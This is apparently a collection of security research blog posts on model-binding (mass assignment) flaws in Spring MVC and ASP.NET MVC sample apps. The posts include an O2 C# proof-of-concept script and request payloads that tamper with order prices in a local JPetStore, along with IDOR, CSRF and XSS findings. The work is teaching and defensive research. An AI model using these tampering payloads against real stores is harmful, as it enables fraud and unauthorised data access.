1 July 2011

O2 Script with BlackBox exploits for Spring MVC AutoBinding vulnerabilities in JPetStore

This script ( that you can find on your local O2 Scripts folder at ‘C:O2O2Scripts_Database_Scripts_Sample_Vulnerabilities\jPetStoreJpetStore - BlackBox Exploits.h2’) shows a blackbox aninimation of a couple Spring MVC Autobinding vulnerabilities in the JPetStore application.

You can see a video of this script in action here: [youtube=http://www.youtube.com/watch?v=yzTExpNZ2bw] Also see this blog post for more details: http://diniscruz.blogspot.com/2011/07/two-security-vulnerabilities-in-spring.html (includes a link to a white paper in this topic published in 2008 (but still very relevant))

Here is the source code of the O2 Script that creates a PoC GUI and allows the controlled execution of 3 variations of the exploits:

 1 var topPanel = "JPetStore 'AutoBinding Vulnerability' PoC".popupWindow(1000,700);
 2 //var topPanel = panel.clear().add_Panel(); 
 3 var actionPanel = topPanel.insert_Above(40);
 4 var ie = topPanel.add_IE_with_NavigationBar().silent(true);
 5 var server = "http://127.0.0.1.:8080";
 6 Action<string,string> login = (username, password) =>
 7     {
 8         ie.open(server + "/jpetstore/shop/signonForm.do");
 9         ie.field("username",username);
10         ie.field("password",password);
11         ie.buttons()[1].click();
12     };
13 Action loginPlaceAnOrderAndGoToCheckout = ()=>
14     {
15         ie.open("http://127.0.0.1:8080/jpetstore");
16         ie.link("Enter the Store").click();
17         //login if needed
18         var signOffLink = ie.links().where((link)=> link.url().contains("signonForm.do")).\
19 first();
20         if(signOffLink.notNull())
21         {
22             signOffLink.click(); login("j2ee", "pwd1");
23         }
24         ie.links().where((link)=> link.url().contains("FISH"))[0].click();
25         ie.link("FI-FW-01 ").flash().click(); ie.links().where((link)=> link.url().contain\
26 s("addItemToCart"))[0].flash().click();
27         ie.links().where((link)=> link.url().contains("checkout.do"))[0].flash().click();
28         ie.links().where((link)=> link.url().contains("newOrder.do"))[0].flash().click();
29     };
30 Action scrollToTotal = ()=>
31     {
32         var tdElement = ie.elements().elements("TD").toList().Where((element)=> element.in\
33 nerHtml().notNull() && element.innerHtml().contains("Total:")).first();
34         tdElement.scrollIntoView();
35         tdElement.injectHtml_beforeEnd("<h2><p align=right>Look at the Total value from th\
36 e table above (it should be 18.50)</p><h2>");
37     };
38 Action<string> exploit_Variation_1 = (payload) =>
39     {
40         loginPlaceAnOrderAndGoToCheckout(); ie.buttons()[1].flash().click();
41         ie.open(server + "/jpetstore/shop/newOrder.do?_finish=true&" + payload); scrollToT\
42 otal();
43     };
44 Action<string> exploit_Variation_1_SetTotalPrice = (totalPrice) =>
45     {
46         var payload = "&order.totalPrice={0}".format(totalPrice); exploit_Variation_1(payl\
47 oad);
48     };
49 Action<string> exploit_Variation_1_SetItemPriceQuantityAndTotalPrice = (totalPrice) =>
50     {
51         var payload = "&order.totalPrice={0}&order.lineItems[0].unitPrice=12&order.lineIte\
52 ms[0].quantity=12".format(totalPrice); exploit_Variation_1(payload);
53     };
54 Action<string> exploit_Variation_2 = (totalPrice) =>
55     {
56         loginPlaceAnOrderAndGoToCheckout();
57         ie.field("order.billToFirstName").flash() .injectHtml_afterEnd("<br>Total Price:<i\
58 nput type=text name='order.totalPrice' value='{0}'/>".format(totalPrice));
59         ie.buttons()[1].flash().click();
60         ie.open("http://127.0.0.1.:8080/jpetstore/shop/newOrder.do?_finish=true");
61         scrollToTotal();
62     };
63 //ie.disableFlashing();
64 var desiredPrice = "";
65 actionPanel.add_Label("Desired Total Price:").top(4)
66      .append_TextBox("").onTextChange((text) => desiredPrice = text).set_Text("1.99")
67     .append_CheckBox("Disable flashing",(value)=>
68         {
69             if (value)
70                 ie.disableFlashing();
71             else
72                 ie.enableFlashing();
73         })
74     .append_Link("Normal Request", ()=> exploit_Variation_1("")).top(24).left(105)
75     .append_Link("Exploit Variation #1 (set TotalPrice) ", ()=> exploit_Variation_1_SetTot\
76 alPrice(desiredPrice))
77     .append_Link("Exploit Variation #2 (set ItemPrice, Item Quantity and TotalPrice) ", ()\
78 => exploit_Variation_1_SetItemPriceQuantityAndTotalPrice(desiredPrice))
79     .append_Link("Exploit Variation #3 (set TotalPrice) ", ()=> exploit_Variation_2(desire\
80 dPrice))
81     .append_Link("Exploit Variation #3 (set TotalPrice) ", ()=> exploit_Variation_2(desire\
82 dPrice))
83     .append_Link("loginPlaceAnOrderAndGoToCheckout; ",()=> loginPlaceAnOrderAndGoToCheckou\
84 t());
85 ie.open("http://127.0.0.1.:8080/jpetstore"); return "done";
86 //O2File:WatiN_IE_ExtensionMethods.cs
87 //using O2.XRules.Database.Utils.O2
88 //O2Ref:WatiN.Core.1x.dll


O2 Script for “Spring MVC JPetStore - Start Servers” (start/stop apache and hsqldb)

Part of the Spring MVC O2 demos, this script will:

• Create a Gui to allow easy start and stop of the JPetStore servers (web and db)
• Shows how to start an apache server and hsqldb directly (i.e. without using *.bat files)
• Provide links to the other jPetStore Spring MVC *.h2 scripts

Injecting FirebugLite and jQuery into a IE Automation page (JPetStore Example)

When doing IE Automation, sometimes the best way to find out what is happening at the page we’re working on is to open FireBug on it. A cool (and very powerfull) alternative is to use FirebugLite which can be embeded on any page and works on most browsers. As you can see here http://getfirebug.com/firebuglite#Stable one way to fireup FirebugLite is to execute that bit of Javascript they show under the ‘Add the following link to your bookmarks:’ section. When using O2’s IE Automation this can be achieved like this: [sourcecode language=”csharp” wraplines=”false”] var firebugLiteScript = &quot;(function(F,i,r,e,b,u,g,L,I,T,E){if(F.getElementById(b))return;E=F[i+’NS’]&amp;&amp;F.documentElement.namespaceURI;E=E?Fi+’NS’:Fi;Er;Er;Er;(Fe[0]||Fe[0]).appendChild(E);E=new Image;Er;})(document,’createElement’,’setAttribute’,’getElementsByTagName’,’FirebugLite’,’4’,’firebug-lite.js’,’releases/lite/latest/skin/xp/sprite.png’,’https://getfirebug.com/’,’#startOpened’);&quot;; ie.eval(firebugLiteScript ); [/sourcecode] And since that works, let’s add it as an Extension method to the WatiN_ExtensionMethods.cs file that is used on the IE Automation script: [sourcecode language=”csharp” wraplines=”false”] public static class WatiN_IE_ExtensionMethods_FireBugLite { public static WatiN_IE inject_FirebugLite(this WatiN_IE ie) { var firebugLiteScript = &quot;(function(F,i,r,e,b,u,g,L,I,T,E){if(F.getElementById(b))return;E=F[i+’NS’]&amp;&amp;F.documentElement.namespaceURI;E=E?Fi+’NS’:Fi;Er;Er;Er;(Fe[0]||Fe[0]).appendChild(E);E=new Image;Er;})(document,’createElement’,’setAttribute’,’getElementsByTagName’,’FirebugLite’,’4’,’firebug-lite.js’,’releases/lite/latest/skin/xp/sprite.png’,’https://getfirebug.com/’,’#startOpened’);&quot;; ie.eval(firebugLiteScript); return ie; } } [/sourcecode] While we are here lets also add jQuery directly (without the need to use the IE_JQuery.cs api) [sourcecode language=”csharp” wraplines=”false”] ie.eval(&quot;&lt;a href=&quot;http://code.jquery.com/jquery-1.6.2.min.js%22.uri().getHtml&quot;&gt;http://code.jquery.com/jquery-1.6.2.min.js&quot;.uri().getHtml&lt;/a&gt;()); [/sourcecode] or as an extension method: [sourcecode language=”csharp” wraplines=”false”] public static class WatiN_IE_ExtensionMethods_JQuery { public static WatiN_IE inject_jQuery(this WatiN_IE ie) { ie.eval(&quot;&lt;a href=&quot;http://code.jquery.com/jquery-1.6.2.min.js%22.uri().getHtml&quot;&gt;http://code.jquery.com/jquery-1.6.2.min.js&quot;.uri().getHtml&lt;/a&gt;()); return ie; } } [/sourcecode] Puting it all together, here is a script that:

• opens up JPetStore
• Injects FirebugLite
• Injects jQuery
• runs a jQuery command that:
• selects an ‘a’ with the content ‘Enter the Store’
• changes its border to 2px
• changes it size to 20px
• fades it out in 2000 ms
• fades is it in 2000 ms

[sourcecode language=”csharp” wraplines=”false”] var topPanel = panel.clear().add_Panel(); var ie = topPanel.add_IE().silent(true); var jPetStore = new API_JPetStore(ie); jPetStore.homePage(); ie.inject_FirebugLite(); ie.inject_jQuery(); ie.eval(&quot;jQuery(\&quot;a:contains(‘Enter the Store’)\&quot;).css({‘border’: ‘solid 10px’, ‘font-size’ : 30 } ).fadeOut(2000).fadeIn(2000);&quot;);&lt;/pre&gt; &amp;nbsp; //O2File:API_JPetStore.cs //O2File:WatiN_IE_ExtensionMethods.cs //using O2.XRules.Database.Utils.O2 //O2Ref:WatiN.Core.1x.dll [/sourcecode] Here is a screenshot what what this looks like:

Viewing JPetStore Hsqldb database and couple more Autobinding issues

Included in the hsqldb folder is a file called manager.bat which can be used to connect to the live (in memory) JPetStore database. Here are the settings needed (select ‘HSQL Database Engine Server’ and use jdbc:hsqldb:hsql://localhost:9002 as the URL value): Here is a sample query:

 1 Here are a couple more Autobinding issues
 2 [sourcecode language="csharp" wraplines="false"]
 3 var ie = topPanel.add_IE_with_NavigationBar().silent(true);
 4
 5  Action scrollToTotal =
 6     ()=>{
 7             var tdElement = ie.elements().elements("TD").toList().Where((element)=> elemen\
 8 t.innerHtml().notNull() && element.innerHtml().contains("Total:")).first();
 9             tdElement.scrollIntoView();                                                   \
10
11         };
12
13 //var _payload = "order.totalPrice=1111&" + "order.lineItems[0].unitPrice=12";  // works
14 //var _payload = "order.totalPrice=1111&" + "order.lineItems[0].itemId=AA";  // throws err\
15 or
16 //var _payload = "order.totalPrice=1111&" + "order.lineItems[0].itemId=EST-6";  // takes t\
17 he inventory from EST-6 and not EST-4
18 var _payload = "order.totalPrice=1111&" + "order.lineItems[0].item.product.name=AAAABBBB";\
19  // changes the visible product name</pre>
20 &nbsp;
21
22 var jPetStore = new API_JPetStore(ie);
23 jPetStore.homePage();
24 jPetStore.loginPlaceAnOrderAndGoToCheckout();
25 ie.buttons()[1].flash().click();
26 jPetStore.open("/shop/newOrder.do?_finish=true&" + _payload);
27 scrollToTotal();
28 [/sourcecode]


Finding the JSP views that are mapped to controlers in JPetStore (Spring MVC)

One of the topics that was discussed at yesterday’s O2 WebCast was ‘how to find the JSPs that are mapped to a controler?’ This is a very important piece of the puzzle since that is one of the few ways we can try to have a fell for the size of the Spring Auto-Binding vulnerabilities (since one of the analysis that needs to be done is the cross-check between what is on the *.jsps and what the Spring MVC engine will autobind into the assigned CommandClass POJO. The first place to look is on the Spring config file, and here is a script that does exactly that: [sourcecode language=”csharp” wraplines=”false”] var topPanel = panel.clear().add_Panel(); var springConfig = @”C:O2Demos\jPetStore - O2 Demo Pack\sourceCode\warWEB-INF\petstore-servlet.xml”;</pre>   springConfig.showInCodeViewer(); //topPanel.add_SourceCodeViewer().open(springConfig); var data = from controller in springConfig.springMvcMappings().Controllers from property in controller.Properties select new { controler = controller.HttpRequestUrl , key = property.Key, value = property.Value }; topPanel.add_TableList().show(data); //return springConfig.springMvcMappings().Controllers[0].Properties[0]; //using O2.XRules.Database.Languages_and_Frameworks.J2EE //using O2.XRules.Database.APIs.IKVM //O2File:spring-servlet-2.0.xsd.cs //O2File:SpringMvcMappings_v2.0.cs //O2Ref:O2Misc_Microsoft_MPL_Libs.dll [/sourcecode] When executed this script will open up the local petstore-servlet.xml config file and show a mapping the bean URLs and its property values As the table created clearly shows, in this application (and this tend to be unique per app) we can’t use the spring config file to fully map the Controller’s views (there are a couple that can be resolved using this method, but there are a lot of missing mappings). A quick look at one of the controlllers shows the most likely solution Which is the fact that the view seems to be set by the contructor of the ModeAndView object: [sourcecode language=”csharp” wraplines=”false”] return new ModelAndView(“ViewOrder”, model); [/sourcecode] The question now is: “How often was this pattern used in JPetStore?”. A first look looks that is common Which is confirmed when looking at the other ModelAndView constructors: So to correctly map these Jsps we are going to have to programatically retrieve the first string value of the ModelAndView constructor and map it to the correct controller. This can be done using the metadata that is exposed from the O2 Java Static Analysis Engine (in the screenshot below note the string value two instructions before the call to the ModelAndView constructor): Once we have the Jsps we will need to find the fields that are used inside that Jsps. At the moment O2 doesn’t have a JSP file parser, but this information should be also retrivable from the created *.class files, which in this case can be found in Tomcat’s temp folder (C:O2Demos\jPetStore - O2 Demo Pack\apache-tomcat-7.0.16\workCatalina\localhost\jpetstore\org\apache\jspWEB002dINF\jsp\spring):

Packaged Spring MVC Security Test Apps: JPetStore and PetClinc

If you are looking to learn about Spring MVC Security, one of the best places to start are the test applications that are included with Spring MVC since they contain a number of Security Vulnerabilities that are common in Spring MVC apps (namely the AutoBinding vulnerabilties) The JPetstore files can be downloaded from: jPetStore - O2 Demo Pack.zip The PetClinic files can be downloaded from jPetClinic - O2 Demo Pack.zip This version of the JPetStore O2 Demo Pack already contains a couple *.H2 files which help with the security testing (PetClinic will soon have them)

Simple Viewer to see JSP files (example using Spring MVC SPetStore)

Here is a simple script that creates a simple viewer for JSP files (note that this version doesn’t support the mapping of internal includes (the next version will)) This tool is available as the Util - View JSPs (simple mode).h2 script and looks like this: and (note the need to map the include files) Here is the source code: [sourcecode language=”csharp” wraplines=”false”] //var topPanel = panel.clear().add_Panel(); var topPanel = “Util - View JSPs (simple mode)”.popupWindow(1000,300); var sourceCodeEditor = topPanel.add_SourceCodeEditor(); var treeView = sourceCodeEditor.insert_Left<Panel>(400).add_TreeView().sort(); treeView.afterSelect<string>((file)=>sourceCodeEditor.open(file).setDocumentHighlightingStrategy(".html")); Action<string,string> loadFilesFromFolder = (folder,extension)=>{ treeView.clear(); foreach(var file in folder.files(extension,true)) treeView.add_Node(file.remove(folder),file); treeView.selectFirst(); };</pre> var testFolderWithJsps = @"C:\O2\Demos\jPetStore - O2 Demo Pack\sourceCode\war"; topPanel.insert_Above(20) .add_TextBox("Path to JSPs",testFolderWithJsps) .onEnter((text)=> loadFilesFromFolder(text , "*.jsp")); loadFilesFromFolder(testFolderWithJsps , "*.jsp"); [/sourcecode] </string></Panel>

Util - Java, Jsp and Xml File Search (Example using Spring MVC JPetStore)

Here is a script that creates a regex based file search. The user can define both the file location and search filters. This is what it looks like when using the files from JPetStore (note: above the files, the textbox on the left is a file filter and the textbox on the right is a regex text search) This is the source code that creates the above GUI: [sourcecode language=”csharp” wraplines=”false”] var simpleSearch = O2Gui.open<ascx_SimpleFileSearch>("Util - Java, Jsp and Xml File Search", 900,500); simpleSearch.Path.splitContainer().panel1Collapsed(true); Action<string, string > loadFiles = (path, fileFilters)=>{ var files = path.files(true,fileFilters.split(",") .ToArray()); simpleSearch.loadFiles(path, files); }; var folderToLoad = @"C:\O2\Demos\jPetStore - O2 Demo Pack\sourceCode"; var filter = "*.jsp,*.xml,*.java"; Action refresh = ()=>{ loadFiles(folderToLoad,filter); }; simpleSearch.insert_Above(20) .add_TextBox("Path",folderToLoad) .onTextChange((text)=> folderToLoad = text) .onEnter((text)=> refresh() ) .parent() .insert_Right(200) .add_TextBox("Filter",filter) .onTextChange((text)=> filter = text) .onEnter((text)=> refresh()) ; refresh(); //O2File:ascx_SimpleFileSearch.cs [/sourcecode]</ascx_SimpleFileSearch>

2 September 2011

example of spring mvc controllers

here is an example of spring MVC controllers. Can you spot the vulnerability?

3 November 2011

Fixing one of JPetStore’s AutoBinding Vulnerabilities (changing the purchase price)

JPetStore (test application included with the Spring Framework) has a couple Autobinding vulnerabilities. The objective of this post is to present a solution for fixing them that meets the following criteria:

• minumal code changes on the controllers
• no code changes on the views
• dramatically reduction of the size of the binded object (the ModelAttribute, CommandClass),
• matches the expected web-layer inputs (i.e. the attack surface)
• supports UnitTesting
• doesn’t rely on Spring Framework’s recommended solution (which is based on the SetAllowedFields and SetDisallowedFields)

Here are a number of posts that give the brackground to this problem and document the O2 Script I’m using to test the fix:

4 May 2012

ASP.NET MVC MUSIC STORE

ASP.NET MVC MUSIC STORE

Order details

HTTP form post fields using Fiddler

HTTP form post fields using Fiddler

Checkout controller

Checkout controller

5 June 2013

Using ASP.NET MVC 4.0 in TeamMentor (with simple Controller, View and master Layout)

On _TeamMentor’s _3.3. release we added support for C# RazorEngine and System.Web.Razor.

For 3.4 release, there is requirement to add Markdown support (see next post). Since the API that I want to use (MarkdownDeep) works really well with ASP.NET MVC 4.0, here is how I added ASP.NET MVC 4.0 support to TeamMentor.

The process was quite smooth, and I was able to quickly get it up and running.

It all started with NuGet where I added this package

Which (after Resharper optimization) results in two MVC dependencies (System.Web.MVC and System.Web.WebPages)

UPDATE: Azure required a couple more MVC dependencies
_
_Since one of my objectives in adding this library is to not touch the TeamMentor.CoreLib assembly (which is where the global.asax.cs file is), I used the Asp.Net App_Code AppInitialize non-documented featured (invoked before Application_Start) technique to register the main Routes on an file called MCV_Config.cs added to the App_Code folder:

I then added a MvcTestController.cs file with a controller class with two methods

… and a view called Index.cshtml **_(located in the **_/Mvc/Views/*_ folder instead of the default _/Views/MvcTest/* folder)

… and a master view called __layout.cshtml** (referenced from the **_Index.cshtml razor file shown above)

… and that is it :)

The __layout.cshtml** file is basically the **_AngularJS main page used by _TBot, _with all the ASP.NET MVC _**interaction happening with the **@RenderBody_ command (shown above)

After compiling the project, here is what the http://localhost:3187/MvcTest looks like (in Chrome inside VisualStudio)

We can also access the same page on http://localhost:3187/MvcTest/FirstAction

And open the other controller method at http://localhost:3187/MvcTest/SecondAction

6 July 2013

Can you spot the security implications/vulnerability of a small change to an ASP.NET MVC 3.0+ Model Binder?

This post contains an example of a serious security vulnerability that is common on ASP.NET MVC applications.

There are two versions of a Model Binder (**CartModelBinder) **class shown below, one or both are vulnerable.

Your job is to find out how to exploit them :)

Note 1: The vulnerability shown in this post is a variation of real-world vulnerability that I helped to find a couple weeks ago (on an UK-based financial services company).

Note 2: I’m yet to to look/review/see a large MVC application** that doesn’t have similar vulnerabilities (on both ASP.NET MVC or Spring MVC)
**
****Note 3:
the code is from the http://sportsstoremvc3.codeplex.com/ sample application, which is used as an ‘real-world application’ example by the Pro ASP.NET MVC 4 book (the code was compiled using .NET 4.0 and executed using the ASP.NET MVC 3.0 and ASP.NET MVC 4.0 versions).

Code to Review:

Let’s say that you have an ASP.NET MVC 4.0 (or 3.0) project with this configuration:

1 protected void Application_Start()
2 {
3     AreaRegistration.RegisterAllAreas();


RegisterGlobalFilters(GlobalFilters.Filters);
RegisterRoutes (RouteTable.Routes);

DependencyResolver.SetResolver(new NinjectDependencyResolver());
}

With the CartModelBinder (used to create instances of the Cart Object) looking like this:

1 public class CartModelBinder : DefaultModelBinder
2 {
3     private const string sessionKey = "Cart";


protected override object CreateModel(ControllerContext controllerContext, ModelBindingContext bindingContext, Type modelType)
{
// get the Cart from the session
Cart cart = (Cart)controllerContext.HttpContext.Session[sessionKey];
// create the Cart if there wasn’t one in the session data
if (cart == null)
{
cart = new Cart();
controllerContext.HttpContext.Session[sessionKey] = cart;
}
// return the cart
return cart;
}
}

With these Cart, CartLine and Product Model classes:

1 public class Cart
2 {
3     private List<CartLine> lineCollection = new List<CartLine>();


public IEnumerable<CartLine> Lines { get { return lineCollection; } } }</CartLine>

public class CartLine
{
public Product Product { get; set; }
public int Quantity { get; set; }
}

public class Product
{
[HiddenInput(DisplayValue = false)]
public int ProductID { get; set; }

[Required(ErrorMessage = “Please enter a product name”)]
public string Name { get; set; }

[DataType(DataType.MultilineText)]
[Required(ErrorMessage = “Please enter a description”)]
public string Description { get; set; }

[Required]
[Range(0.01, double.MaxValue, ErrorMessage = “Please enter a positive price”)]
public decimal Price { get; set; }

//[HiddenInput(DisplayValue = false)]
public int CategoryID { get; set; }

public virtual Category Category { get; set; }
}

And finally, with these controllers:

1 public RedirectToRouteResult AddToCart(Cart cart, int productId, string returnUrl)
2 {
3     Product product = repository.Products
4         .FirstOrDefault(p => p.ProductID == productId);


if (product != null)
{
}
return RedirectToAction(“Index”, new { returnUrl });
}

public PartialViewResult Summary(Cart cart)
{
return PartialView(cart);
}

public ViewResult Index(Cart cart,string returnUrl)
{
return View(new CartIndexViewModel
{
Cart = cart,
ReturnUrl = returnUrl
});
}

Can you spot any security vulnerability(ies)?

What about if we change the CartModelBinder _**to use the **_IModelBinder (and BindModel) instead of DefaultModelBinder (and CreateModel)?

1 public class CartModelBinder : IModelBinder
2 {
3     private const string sessionKey = "Cart";


public object BindModel(ControllerContext controllerContext,ModelBindingContext bindingContext)
{

// get the Cart from the session
Cart cart = (Cart)controllerContext.HttpContext.Session[sessionKey];
// create the Cart if there wasn’t one in the session data
if (cart == null)
{
cart = new Cart();
controllerContext.HttpContext.Session[sessionKey] = cart;
}
// return the cart
return cart;
}
}

Anything changed? (from a security point of view, since the app works ok with both versions)

Can you spot any security vulnerability with this 2nd version of the CartModelBinder?

Or are both vulnerable?

:)
**
****Wrapping up: Here is the question being asked in this post:**
_
_

What is are the security implications of these two variations of an **CartModelBinder **(which both provide the same business-logic functionality)

**
****Some references and related articles:**
**
**External:

From this blog

Nice business logic vulnerability and CSRF on the ASP.NET MVC Design Patterns book sample

Following a comment on this reddit threadt I did a search for ‘ASP.NET MVC Design’ patterns and found the site https://aspnetdesignpatterns.codeplex.com which is from the Wrox Professional ASP.NET Design Patterns book.

Since it looked like a nice MVC application, I grabbed a copy of the source code, upgraded it to .NET 4.0/MVC 4.0 (now on GitHub here) and had a quick look for MVC ModelBinding vulnerabilities.

And although it looks like the app is NOT vulnerable to MVC Model injections, that is mainly because there are very few controllers that use ModelBinding (i.e. that Design Pattern was not used (which ironically is my main recommendation to deal with MVC ModelBinding Vulnerabilities: don’t use Model Binding :) )).

Insecure Direct Object References

While looking for ModelBinding issues, I also had a look for the Top 10 2013-A4-Insecure Direct Object References and found a nice example of what not to do.

Here is the user page with the past orders

…. here is the page where I can see the 1st order (for the current user)

…. and here is the 2nd order:

… spot any probs so far?

Here is the controller that handles that request:

Since this controller asks for an orderId (which as seen above, in our current user’s case was 29 and 30), where is the code that checks that the requested orderId belongs to the current user?

…. well since in this case it is not there

… it is possible to see other customer’s orders (and shipping address)

Which makes for a nice example of an business logic vulnerability, where the request data is valid, but we are accessing information that shouldn’t be visible to the current logged in user.

The solution for this vulnerability is to Use Indirect Object References

CSRF
**
**This app is also vulnerable to CSRF (Cross Site Request Forgery)

Here is the raw HTTP Request (with only a valid session ID and Basket)

…which changed the current total of items we’re buying to 11:

This app also could do a much better job
**
**

… at handling malformed data

… with some errors only caught on the view (due to lack of data in the model)

**
****XSS via product data**
**
**Talking about the views, this app does a pretty good job at using HtmlEncode on the views, except on this page:

Which means that XSS payloads could be introduced via the product database (normally managed via other systems/websites)

Is there more?
**
**Probably, and it would be interesting to find and fix them (grab the code from GitHub and have a go)

Day 1 - made it to Vegas, start of ASP.NET MVC research

So after an 18h flight (with stopover in Toronto) I made it to Las Vegas. It was a really productive flight and I was finally able to spend some time focus on really learning how the ASP.NET MVC actually works.

I read a large section of Professional ASP.NET MVC 4 book (by Wrox) which is a great way to quickly learn what can be done with MVC 4. Although still very light on security, that book is actually one of the best ones (of all ASP.NET MVC books I have) on ‘mentioning’ security. Unfortunately, on the ModelBinding vulnerabilities (aka over-posting), there is very little to alert the reader for the dangers of MVC’s ModelBinding.

This is also the first 24h that I have been off-the-main-grid (see Trying to keep secure while at BlackHat and DefCon 2013) and there are still a couple things to sort out:

• I got an US SIM card, but it looks like my IPhone is not unlocked after all, so either I unjailbreak it or get an cheap android phone for the week
• At the airport I bough an Windows Surface RT, since they are now £250 and I needed something to do after my battery died during the flight over (I also want to run the O2 Platform on it, and create an TeamMentor app for it)
• Before I left I also:
• added the diniscruz_defcon@outlook.com email account to this blog as an author (so I can write posts like this :) )
• created a twitter account https://twitter.com/DCruz_DefCon which I wanted to link into my main account (I run out of time, where the idea was to have a bot somewhere retweeting that into my main twitter)
• Going without email is interesting and very liberating (the people that matter know my new email address so I’m not missing nothing that urgent).
• It is also quite interesting to think about how create an environment that is secure(r) and one that is easier to detect if there has been any type of compromise
• On the topic of security John Wilander just tweeted a link to this 272 page pdf on Mac OS X Security Configuration which looks quite good (and he is now using temp pwds which is a great thing)

Today I all about coding and researching (not really planning to go to BlackHat today). I’m going to stay around the Mirage and code/blog away on what I will present on Sunday with Abe (btw the DefCon schedule is out and we are presenting Resting on Your Laurels will get you Pwned: Effectively Code Reviewing REST Applications to avoid getting powned on Sunday at 11:00 am (track 4)

MVC ModelBinding Vulnerability in Contoso University sample (first raw PoC)

While on the plane to Vegas, I looked at a number of ASP.NET MVC apps (ping me if you know of other good ones to look at (with publicly available source code)).

I was trying to find one that had good examples of MVC ModelBinding Vulnerabilities (aka overposting), in a real-world-kinda-way (I have found tons of MVC ModelBinding Vulnerability examples which usually get dismissed with a ‘that is not the recommended way to code MVC controllers’).

So I think I found a great example (of what not to do) on the Contoso University sample.

This application is explained in detail in this article Creating an Entity Framework Data Model for an ASP.NET MVC Application (1 of 10) and can be downloaded from http://code.msdn.microsoft.com/ASPNET-MVC-Application-b01a9fe8/view/SourceCode (as shown below, you can also get this from the official ASP.NET MVC website)

Remember that this is how developers learn about programming ASP.NET MVC, so it is important that the code samples they have access to (from reputable sources like http://www.asp.net/mvc) are rock solid and don’t have MVC ModelBinding Vulnerabilities.

A quick look at the code showed numerous vulnerable controllers, and in this first (raw) PoC example, we are going to exploit the public **ActionResult Edit(int id, FormCollection formCollection, string[] selectedCourses) **method from the InstructorController.cs file.

This is what the vulnerable code looks like:

Here is the list of current Instructors (note the extra course on Scratch (added in a previous execution of the PoC)

Here is the page that is used to edit an Instructor’s details (and the one we will use on the exploit)

Here is the source code of the exploit PoC:

Here is the execution of the code shown above (with a new course on _‘Exploit MVC’ _which was added by the exploit)

This is actually an interesting scenario, specially since the affected controller tries to prevent injection into the Courses field :)

My next series of blog posts will explain how this works, and how it was possible to ‘add a new course while editing an Instructor details’

7 October 2012

Exploiting Microsoft MVC vulnerabilities using OWASP O2 Platform

Michael Hidalgo wrote this great article on using O2 to exploit an overposting (i.e. auto-binding) vuln in an ASP.NET MVC demo app: Exploiting Microsoft MVC vulnerabilities using OWASP O2 Platform

As you can notice that was posted on CodeProject.com which has always been a good source of technical content for me (although not a site I would use everyday). That said, I’m starting to like the new version of http://codeproject.com and this could be a great place to post O2-related technical articles.

On the Asp.NET MVC topic, if you are interested, here are a couple related posts:

The next step is to see how we can write SAST rules (maybe executed by Cat.NET) to find these issues on the source code.

I really don’t have hard numbers, but I will bet that the number of Asp.NET apps vulnerable is really high (just like what happens with the Spring Framework MVC)

Tool - O2 Cmd SpringMVC v1.0.exe - as standalone exe

I just had a request for the O2’s Spring MVC module (developed ages ago), and It was was a good opportunity to test the latest version of the ‘_O2 Standalone tool builde_r’, since it now supports the embedding of the tools installed via an O2 Script (usually stored in the _ToolsOrApis folder).

You can download the Tool - O2 Cmd SpringMVC v1.0.exe (or build it using O2) which is the stand alone exe of the old O2_Cmd_SpringMvc.msi tool (See at the end of this post for details on how this exe was created)

When you open this tool, you will get a GUI that looks like this:

Then if you drop a jar (or the zip of *.classes like the one you will find in the jPetClinic – O2 Demo Pack.zip that you get from the Packaged Spring MVC Security Test Apps: JPetStore and PetClinc ), a series of conversions will occur (Jython is used to parse the java byte code) :

Which when finished will look like this:

For a detailed explanation of how this module works (including the VERY important /*O2Helper:MVCAutoBindListObject: hack) take a look at this blog post:
Visualizing Spring MVC Annotations based Controls (and Autobinding PetClinic’s vulnerabilities)

How the Tool - O2 Cmd SpringMVC v1.0.exe was created

It was quite easy to package the O2_Cmd_SpringMvc.msi tool (note-to-self: do this for the other really powerful old O2 tools that are gathering dust in the O2 archives)

**
**

Step 2: In an O2 C# REPL script create the_ Tool - O2 Cmd SpringMVC.h2_ file

Which will consume the installers (shown above) and will trigger the extraction (when executed for the first time as a standalone exe)

Step 3: Open the context menu and chose the item to package the current script

And that’s it!

The package tool (which is a script it self) should be open with the created exe:

It’s quite powerful the fact that it took me longer to write this blog post than to package that old O2 tool :)

8 December 2012

ASP.NET MVC – XSS and AutoBind Vulns in MVC Example app (from 2008)

Here is a old pdf that I wrote ages ago (Sep 2008) that documents a couple Spring MVC AutoBinding vulnerabilities (similar to the ones shown in Exploiting Microsoft MVC vulnerabilities using OWASP O2 Platform)

ASP.NET Support in SAST and IBM F4F

At the moment (Dec 2012) my understanding is that all SAST tools struggle to scan/understand ASP.NET MVC apps.

The only way to really support/understand/scan ASP.NET MVC is to map how that framework works/behaves (I don’t think any SAST vendor/tool does that), and as with any Framework, there is a lot to map:

• The controllers (equivalent to WebService’s methods, which need to be marked as Tainted-Sources/Callbacks)
• **The controller’s authorization/authentication **mappings (done using Attributes)
• The Autobinded Models
• The Views mappings (i..e what views are connected to what controllers)
• The MVC Execution life cycle
• The auto-encoding (or not)** of view controls **(and new display engines like razor)

The core concept is that we need an ‘ASP.NET MVC’ aware parser/tool that will then be used to mass create the rules for the SAST scanners.

The approach that I take with the O2 Platform is to do just that, and it all starts with trying to find out where the controllers are and the cases where Model-Attributes are used (I.e autobindings).

That said, at the moment there is not a lot of support in the O2 Platform for ASP.NET MVC (specially when compared with Spring MVC). There are a couple ASP.NET MVC mini-tools in the O2 Scripts folder that help with ASP.NET MVC controllers visualization (which I plan to document and post about) and there is the CodeProject article: Exploiting Microsoft MVC vulnerabilities using OWASP O2 Platform

For reference see the Spring Framework posts (which show what we will need to do for ASP.NET MVC):

Back in ASP.NET MVC land, once we have the (for example) controller’s mappings, they will need to ‘communicated’ to the SAST engine.

One way to do this is to mass create rules directly on the SAST engine database (like what I used to do with OunceLabs MySql database).

Another way (if you are an AppScan Source user) is to use the newly released IBM F4F (Framework for Frameworks) technology/concept.

If you don’t know what F4F is, here are some IBM resources/papers:

I think F4F is a great idea and concept, since it is a way to mass create rules (and mappings) that tell the AppScan Source engine where are the source and sinks (and glues) of the app being scan.

But for F4F to really live to its potential, we will need a much better understanding of how it works and how it can be used (IBM will also need to release F4F under an open licence, but that is a topic for another post). The first step is to visualize what is already in the WAFL files (part of F4F) and how they can be created and manipulated.

There are already a couple WAFL related scripts in O2 but we need a lot more :)

9 January 2013

OData ASP.NET Web API: An Mass Assignment vulnerability in the making?

When I saw Getting started with OData services in ASP.NET Web API (via reddit) :

I immediately thought Mass Assignment Vulnerability!
**
